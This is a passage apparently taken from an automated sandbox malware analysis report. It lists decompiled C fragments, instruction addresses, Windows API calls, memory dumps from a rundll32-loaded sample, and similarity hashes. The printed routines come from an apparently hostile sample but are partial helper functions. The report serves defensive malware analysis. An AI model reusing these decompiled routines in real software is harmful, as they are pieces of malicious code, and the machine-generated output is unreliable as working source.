						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L00E57DDC();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L00E57DD6();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E00E521FA(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E00E55C5B(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E00E5584E(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(_a8 * 4 +  &E00E5A188) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                                          0x00e5472e
                                                          0x00e5473a
                                                          0x00e54740
                                                          0x00e54745
                                                          0x00e54749
                                                          0x00e548bb
                                                          0x00e548bf
                                                          0x00e548bf
                                                          0x00e5474f
                                                          0x00e54753
                                                          0x00e54759
                                                          0x00e5475a
                                                          0x00e54765
                                                          0x00e5476b
                                                          0x00e54770
                                                          0x00e54773
                                                          0x00e5478d
                                                          0x00e5479c
                                                          0x00e547a8
                                                          0x00e547b2
                                                          0x00e547b7
                                                          0x00e547b9
                                                          0x00e547bc
                                                          0x00e54873
                                                          0x00e54879
                                                          0x00e5488a
                                                          0x00e5489d
                                                          0x00e548b3
                                                          0x00000000
                                                          0x00e548b8
                                                          0x00e547c5
                                                          0x00e547cc
                                                          0x00e547d0
                                                          0x00e547d6
                                                          0x00e547d8
                                                          0x00e547da
                                                          0x00e547dc
                                                          0x00e547de
                                                          0x00e547e8
                                                          0x00e547ed
                                                          0x00e547ef
                                                          0x00e547f1
                                                          0x00e547f2
                                                          0x00e547f3
                                                          0x00e547f4
                                                          0x00e547fb
                                                          0x00e54802
                                                          0x00e54805
                                                          0x00e54805
                                                          0x00e547d2
                                                          0x00e547d2
                                                          0x00e547d2
                                                          0x00e5480d
                                                          0x00e54815
                                                          0x00e54821
                                                          0x00e54826
                                                          0x00e54826
                                                          0x00e5482b
                                                          0x00000000
                                                          0x00000000
                                                          0x00e5482d
                                                          0x00e54830
                                                          0x00e5483d
                                                          0x00000000
                                                          0x00000000
                                                          0x00e5483f
                                                          0x00e5483f
                                                          0x00e5484c
                                                          0x00e54826
                                                          0x00e5482b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e5482b
                                                          0x00e54856
                                                          0x00e54859
                                                          0x00e5485c
                                                          0x00e54863
                                                          0x00e54863
                                                          0x00e54870
                                                          0x00000000
                                                          0x00e54870
                                                          0x00e5475c
                                                          0x00e54760
                                                          0x00e54761
                                                          0x00e54763
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e54763
                                                          0x00000000

                                                          APIs
                                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 00E547DE
                                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00E547F4
                                                          • memset.NTDLL ref: 00E5489D
                                                          • memset.NTDLL ref: 00E548B3
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memset$_allmul_aulldiv
                                                          • String ID:
                                                          • API String ID: 3041852380-0
                                                          • Opcode ID: 41b2a0bcb69ceb65d0f3a4fbe84ad08320b2b65d4ffdb1e01b01ff8a7a209b9b
                                                          • Instruction ID: 2845cb702d38c54f334500b0727b21660ab83e287dbd18a7f61b7b89fbbfd1f0
                                                          • Opcode Fuzzy Hash: 41b2a0bcb69ceb65d0f3a4fbe84ad08320b2b65d4ffdb1e01b01ff8a7a209b9b
                                                          • Instruction Fuzzy Hash: 2A410172A00209AFDB10DF68CC41BEE77B4EF46315F005969BD09B7281EB709E888B80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557AB85, Relevance: 6.1, APIs: 4, Instructions: 129stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCommandLineA.KERNEL32 ref: 0557AB95
                                                          • StrChrA.SHLWAPI(00000000,00000020), ref: 0557ABA6
                                                            • Part of subcall function 05586403: lstrlen.KERNEL32(0559B072,059BB184,0559B072,00000000,05591D0C), ref: 0558640C
                                                            • Part of subcall function 05586403: memcpy.NTDLL(00000000,?,00000000,00000001), ref: 0558642F
                                                            • Part of subcall function 05586403: memset.NTDLL ref: 0558643E
                                                          • ExitProcess.KERNEL32 ref: 0557ACF4
                                                            • Part of subcall function 0557D01E: StrChrA.SHLWAPI(00000000,05572A10,7748D3B0,059BB17C,00000000,?,055771D1,05572A10,00000020,059BB17C,?,?,?,?,?,05572A10), ref: 0557D043
                                                            • Part of subcall function 0557D01E: StrTrimA.SHLWAPI(00000000,0559847C,00000000,?,055771D1,05572A10,00000020,059BB17C,?,?,?,?,?,05572A10), ref: 0557D062
                                                            • Part of subcall function 0557D01E: StrChrA.SHLWAPI(00000000,05572A10,?,055771D1,05572A10,00000020,059BB17C,?,?,?,?,?,05572A10), ref: 0557D06E
                                                          • lstrcmp.KERNEL32(-0000000C,?), ref: 0557AC12
                                                            • Part of subcall function 05581577: FindFirstFileW.KERNEL32(?,?,?,?), ref: 05581603
                                                            • Part of subcall function 05581577: lstrlenW.KERNEL32(?), ref: 0558161F
                                                            • Part of subcall function 05581577: lstrlenW.KERNEL32(?), ref: 05581637
                                                            • Part of subcall function 05581577: lstrcpyW.KERNEL32(00000000,?), ref: 05581650
                                                            • Part of subcall function 05581577: lstrcpyW.KERNEL32(00000002), ref: 05581665
                                                            • Part of subcall function 05581577: FindNextFileW.KERNEL32(?,00000010), ref: 0558168D
                                                            • Part of subcall function 05581577: FindClose.KERNEL32(00000002), ref: 0558169B
                                                            • Part of subcall function 05581577: FreeLibrary.KERNEL32(?), ref: 055816AD
                                                            • Part of subcall function 0558C07A: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 0558C09D
                                                            • Part of subcall function 0558C07A: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000000E,?,?,0557AC52,?), ref: 0558C0DE
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Findlstrlen$FileFreeHeaplstrcpy$AllocateCloseCommandExitFirstLibraryLineNextProcessTrimlstrcmpmemcpymemset
                                                          • String ID:
                                                          • API String ID: 2123058440-0
                                                          • Opcode ID: 738c42eaa723a0b3d7fdf12a023255665981e11a0595f3f54a7f700bb6e1a369
                                                          • Instruction ID: 268e36daed9136502d5d7b2f20ffb4129cf0c9df7b4ca708e25bd13125d54ba9
                                                          • Opcode Fuzzy Hash: 738c42eaa723a0b3d7fdf12a023255665981e11a0595f3f54a7f700bb6e1a369
                                                          • Instruction Fuzzy Hash: 2A416D7161820ABFD710EF61E889C2FBBEEFB84250F08482DF556D2150EB35D9099B52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055765C0, Relevance: 6.1, APIs: 4, Instructions: 120synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(00000000), ref: 0557ADA7
                                                          • GetLastError.KERNEL32 ref: 0557ADC7
                                                            • Part of subcall function 05588A11: wcstombs.NTDLL ref: 05588ACF
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastObjectSingleWaitwcstombs
                                                          • String ID:
                                                          • API String ID: 2344289193-0
                                                          • Opcode ID: a62c804a68f00412cbbec37ee25d077b58fb4b7dc11ac51b59ebbd673ba2cc7b
                                                          • Instruction ID: 9c8089c415492ae18b9073183b02f0f4c20374815ef0df93bd49256fc5d99904
                                                          • Opcode Fuzzy Hash: a62c804a68f00412cbbec37ee25d077b58fb4b7dc11ac51b59ebbd673ba2cc7b
                                                          • Instruction Fuzzy Hash: 21413C7190421DEFDF20DFA5E9849BEBBBAFF44346F50446AE402E7250EB349A44DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05583BD6, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 108stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 05592B55: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0558381A,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,0558D9B6), ref: 05592B61
                                                            • Part of subcall function 05592B55: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0558381A,00000000,00000000,00000000,00000008,0000EA60,00000000), ref: 05592BBF
                                                            • Part of subcall function 05592B55: lstrcpy.KERNEL32(00000000,00000000), ref: 05592BCF
                                                          • lstrlen.KERNEL32(?,00000000,00000000,00000004,00000000,?), ref: 05583C25
                                                          • wsprintfA.USER32 ref: 05583C55
                                                          • GetLastError.KERNEL32 ref: 05583CCA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$ErrorLastlstrcpymemcpywsprintf
                                                          • String ID: `
                                                          • API String ID: 324226357-1850852036
                                                          • Opcode ID: 1018ae7aba8b9650640a75f81d63ebb28a9e17e32eda83c2529d89160c949f40
                                                          • Instruction ID: 717b38b549ac9c64f00dacc777bb729a01e2332402451d242e73ed22e2fcfe5b
                                                          • Opcode Fuzzy Hash: 1018ae7aba8b9650640a75f81d63ebb28a9e17e32eda83c2529d89160c949f40
                                                          • Instruction Fuzzy Hash: 9F31037120020AAFDF11EF65DC89FAB3BB9FF44350F21442AF906A6150EB75E918CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557C133, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0558118B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000), ref: 05581199
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0557C19B
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0557C1EA
                                                            • Part of subcall function 0558C45A: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,05593D7C), ref: 0558C49B
                                                            • Part of subcall function 0558C45A: GetLastError.KERNEL32 ref: 0558C4A5
                                                            • Part of subcall function 0558C45A: WaitForSingleObject.KERNEL32(000000C8), ref: 0558C4CA
                                                            • Part of subcall function 0558C45A: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 0558C4EB
                                                            • Part of subcall function 0558C45A: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 0558C513
                                                            • Part of subcall function 0558C45A: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 0558C528
                                                            • Part of subcall function 0558C45A: SetEndOfFile.KERNEL32(00000006), ref: 0558C535
                                                            • Part of subcall function 0558C45A: CloseHandle.KERNEL32(00000006), ref: 0558C54D
                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,00000101,?,?,?,05573B1E,?,?,?,?,?,00000000), ref: 0557C21F
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,05573B1E,?,?,?,?,?,00000000,?,00000000,?,0557316A), ref: 0557C22F
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
                                                          • String ID:
                                                          • API String ID: 4200334623-0
                                                          • Opcode ID: aef79b6da919b342c759c962bf777299656ec97d13acc6eb458b81502cd7ae0b
                                                          • Instruction ID: 055ccf3e3f850fcce125bd23254ea65764e0a302bdcce1f717a8f65de946f6ad
                                                          • Opcode Fuzzy Hash: aef79b6da919b342c759c962bf777299656ec97d13acc6eb458b81502cd7ae0b
                                                          • Instruction Fuzzy Hash: A2313772510019FFEB109FA5EC8ACAEBF7DFB08250B124066F505D3150DB75AE55EBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055834A6, Relevance: 6.1, APIs: 4, Instructions: 83memoryregistryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 055834FF
                                                          • memcpy.NTDLL(00000018,?,?), ref: 05583528
                                                          • RegisterWaitForSingleObject.KERNEL32(00000010,?,0558E968,00000000,000000FF,00000008), ref: 05583567
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0558357A
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
                                                          • String ID:
                                                          • API String ID: 2780211928-0
                                                          • Opcode ID: 735aebe96205663e89e61a7dd59508fa3a818d478137fa784a3c3b28c28b7bf8
                                                          • Instruction ID: dac8739b23c0f97587dcaf985e58697fde8e0f9b776731c2c7ec92345244b48c
                                                          • Opcode Fuzzy Hash: 735aebe96205663e89e61a7dd59508fa3a818d478137fa784a3c3b28c28b7bf8
                                                          • Instruction Fuzzy Hash: 89317170200205AFDB209F29EC46EAA7FB9FF09721F01451AF915D72A0DB74E919DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055788B4, Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • TlsGetValue.KERNEL32(?), ref: 055788E3
                                                          • SetEvent.KERNEL32(?), ref: 0557892D
                                                          • TlsSetValue.KERNEL32(00000001), ref: 05578967
                                                          • TlsSetValue.KERNEL32(00000000), ref: 05578983
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Value$Event
                                                          • String ID:
                                                          • API String ID: 3803239005-0
                                                          • Opcode ID: 6cc26e76c4ca78a947ac572b37973f4bddf404b72a072dfd6d5c02eb2420ffce
                                                          • Instruction ID: e4866fb292cac5e463ec7796a7d6e25bf4ae4e6142423437ed2e6982db5aae62
                                                          • Opcode Fuzzy Hash: 6cc26e76c4ca78a947ac572b37973f4bddf404b72a072dfd6d5c02eb2420ffce
                                                          • Instruction Fuzzy Hash: B821E031204209AFCF219F18EC8ED6ABBB3FF41320B050425F446CA2A0D731EC95EB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557A50D, Relevance: 6.1, APIs: 4, Instructions: 82memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualProtect.KERNEL32(?,00000004,00000040,?,?,?), ref: 0557A583
                                                          • VirtualProtect.KERNEL32(?,00000004,?,?,?,?), ref: 0557A5B3
                                                          • RtlEnterCriticalSection.NTDLL(0559C300), ref: 0557A5C2
                                                          • RtlLeaveCriticalSection.NTDLL(0559C300), ref: 0557A5E0
                                                          • GetLastError.KERNEL32(?,?), ref: 0557A5F0
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                                                          • String ID:
                                                          • API String ID: 653387826-0
                                                          • Opcode ID: 191cfa6ac19d436239a851b9d7d00aaf792c8c78561dfe8c5671790f7e5d8692
                                                          • Instruction ID: 662655bebcb7d26644ab88a672d714f67ddaa1d3fa8b8642ee2b5f5d42cffd12
                                                          • Opcode Fuzzy Hash: 191cfa6ac19d436239a851b9d7d00aaf792c8c78561dfe8c5671790f7e5d8692
                                                          • Instruction Fuzzy Hash: A73148B6600709EFDB10CFA8ED95A9ABBF8FB09200B414519E5A6D3710EB30E904DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05578430, Relevance: 6.1, APIs: 4, Instructions: 82memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 05591B2C: memcpy.NTDLL(00000000,00000110,?,?,00000000,00000000,0557190C,?,00000001,?,?), ref: 05591B62
                                                            • Part of subcall function 05591B2C: memset.NTDLL ref: 05591BD8
                                                            • Part of subcall function 05591B2C: memset.NTDLL ref: 05591BEC
                                                          • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 05578488
                                                          • lstrcmpi.KERNEL32(00000000,?), ref: 055784AF
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 055784F4
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000), ref: 05578505
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$Freememset$Allocatelstrcmpimemcpy
                                                          • String ID:
                                                          • API String ID: 1065503980-0
                                                          • Opcode ID: a40ab8f84aae253b2f47ddcdb4d652962b368956ad0c7e5487b5778e55f1336a
                                                          • Instruction ID: bca7c491dd2a079d36893cc715c7fb0377d7b92bc5af19d3f83d2c5fb0b98372
                                                          • Opcode Fuzzy Hash: a40ab8f84aae253b2f47ddcdb4d652962b368956ad0c7e5487b5778e55f1336a
                                                          • Instruction Fuzzy Hash: A2218075A0020AFFDF10AFA5EC89EAD7FBAFB44218F014066F905A6110DB34AD48EF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05591B2C, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 82COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • memcpy.NTDLL(00000000,00000110,?,?,00000000,00000000,0557190C,?,00000001,?,?), ref: 05591B62
                                                          • memset.NTDLL ref: 05591BD8
                                                          • memset.NTDLL ref: 05591BEC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memset$AllocateHeapmemcpy
                                                          • String ID: g*+%
                                                          • API String ID: 1529149438-2400975550
                                                          • Opcode ID: 07aa32d725111938068852d0ab68d61d1a55a98dde1a77b38b4b89460e224e44
                                                          • Instruction ID: 9a7093e823c0454c2e8c09ed277e14ecda0445c6c57245b3d3b539f7e95e4f59
                                                          • Opcode Fuzzy Hash: 07aa32d725111938068852d0ab68d61d1a55a98dde1a77b38b4b89460e224e44
                                                          • Instruction Fuzzy Hash: B6216B75A0052ABBDF11AFA5CC45FAEBBB9FF88640F044065F904E7250E738DA00CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E53AD2, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 78%
                                                          			E00E53AD2(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E00E55FBC(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                                          0x00e53ade
                                                          0x00e53ae2
                                                          0x00e53ae3
                                                          0x00e53ae4
                                                          0x00e53ae6
                                                          0x00e53ae8
                                                          0x00e53aed
                                                          0x00e53af0
                                                          0x00e53b87
                                                          0x00e53b8e
                                                          0x00e53b8e
                                                          0x00e53af9
                                                          0x00e53b00
                                                          0x00e53b10
                                                          0x00e53b10
                                                          0x00e53b16
                                                          0x00e53b18
                                                          0x00e53b1d
                                                          0x00e53b26
                                                          0x00e53b2e
                                                          0x00e53b31
                                                          0x00e53b3c
                                                          0x00e53b40
                                                          0x00e53b42
                                                          0x00e53b43
                                                          0x00e53b4c
                                                          0x00e53b50
                                                          0x00e53b61
                                                          0x00e53b52
                                                          0x00e53b57
                                                          0x00e53b5c
                                                          0x00e53b6b
                                                          0x00e53b6b
                                                          0x00e53b40
                                                          0x00e53b71
                                                          0x00e53b77
                                                          0x00e53b77
                                                          0x00e53b80
                                                          0x00e53b85
                                                          0x00e53b85
                                                          0x00000000

                                                          APIs
                                                          • Sleep.KERNEL32(000000C8), ref: 00E53B00
                                                          • lstrlenW.KERNEL32(?), ref: 00E53B36
                                                          • memcpy.NTDLL(00000000,?,00000000,00000000), ref: 00E53B57
                                                          • SysFreeString.OLEAUT32(?), ref: 00E53B6B
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeSleepStringlstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1198164300-0
                                                          • Opcode ID: 68bca8c8586df0e035bee903edbb0b4cf9761ef184102feb111d5680565d4a67
                                                          • Instruction ID: 967a08cc87c7369b43beb42cd74130db542e083c1537f881b67d4ce116775a9f
                                                          • Opcode Fuzzy Hash: 68bca8c8586df0e035bee903edbb0b4cf9761ef184102feb111d5680565d4a67
                                                          • Instruction Fuzzy Hash: 84214C75A00209EFCB10DFA8C88499EBBB8EF49356B104969E905E7211E7309E08CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055924F2, Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.NTDLL ref: 05592521
                                                          • lstrlen.KERNEL32(00000000), ref: 05592531
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • strcpy.NTDLL ref: 05592548
                                                          • StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 05592552
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeaplstrlenmemsetstrcpy
                                                          • String ID:
                                                          • API String ID: 528014985-0
                                                          • Opcode ID: 6c714b63823338bc2efb7455c0c61eddd26efc497289f3507549cb659bbfdbfc
                                                          • Instruction ID: 4a9b48d8baa441306aa6665de3db606ff91a1b7474826068fa01d6c26f68bbbd
                                                          • Opcode Fuzzy Hash: 6c714b63823338bc2efb7455c0c61eddd26efc497289f3507549cb659bbfdbfc
                                                          • Instruction Fuzzy Hash: 40219579118706BFEB24AF64E849B2A77EDFF84321F00841AF8579A141EF7DD4049B51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05593F16, Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(059BB148), ref: 05593F2C
                                                          • RtlLeaveCriticalSection.NTDLL(059BB148), ref: 05593F47
                                                          • GetLastError.KERNEL32(?,?,?), ref: 05593FB5
                                                          • GetLastError.KERNEL32(?,?,?), ref: 05593FC4
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalErrorLastSection$EnterLeave
                                                          • String ID:
                                                          • API String ID: 2124651672-0
                                                          • Opcode ID: 219bdf11904ace752c0a6cf3e8bc063bdfd49edef8338ab76bf0dd7b530684f1
                                                          • Instruction ID: 5cf64fb6674d67bf1519f5562804ef78aed22ec15f99e55ab4cab46fc1196cde
                                                          • Opcode Fuzzy Hash: 219bdf11904ace752c0a6cf3e8bc063bdfd49edef8338ab76bf0dd7b530684f1
                                                          • Instruction Fuzzy Hash: 56215A36511208EFCF12CFA4D945A9EBBB9FF44711F028556F806A7250CB38DA19EB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557C361, Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.NTDLL ref: 0557C383
                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 0557C3C7
                                                          • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 0557C40A
                                                          • CloseHandle.KERNEL32(?,?,?,?,?), ref: 0557C42D
                                                            • Part of subcall function 0558A0E5: GetTickCount.KERNEL32 ref: 0558A0F5
                                                            • Part of subcall function 0558A0E5: CreateFileW.KERNEL32(05579E67,80000000,00000003,0559C1A8,00000003,00000000,00000000,?,05579E67,00000000,?,05571A31,00000000), ref: 0558A112
                                                            • Part of subcall function 0558A0E5: GetFileSize.KERNEL32(05579E67,00000000,?,00000001,?,05579E67,00000000,?,05571A31,00000000), ref: 0558A145
                                                            • Part of subcall function 0558A0E5: CreateFileMappingA.KERNEL32(05579E67,0559C1A8,00000002,00000000,00000000,05579E67), ref: 0558A159
                                                            • Part of subcall function 0558A0E5: lstrlen.KERNEL32(05579E67,?,05579E67,00000000,?,05571A31,00000000), ref: 0558A175
                                                            • Part of subcall function 0558A0E5: lstrcpy.KERNEL32(?,05579E67), ref: 0558A185
                                                            • Part of subcall function 0558A0E5: HeapFree.KERNEL32(00000000,05579E67,?,05579E67,00000000,?,05571A31,00000000), ref: 0558A1A0
                                                            • Part of subcall function 0558A0E5: CloseHandle.KERNEL32(05579E67,?,00000001,?,05579E67), ref: 0558A1B2
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
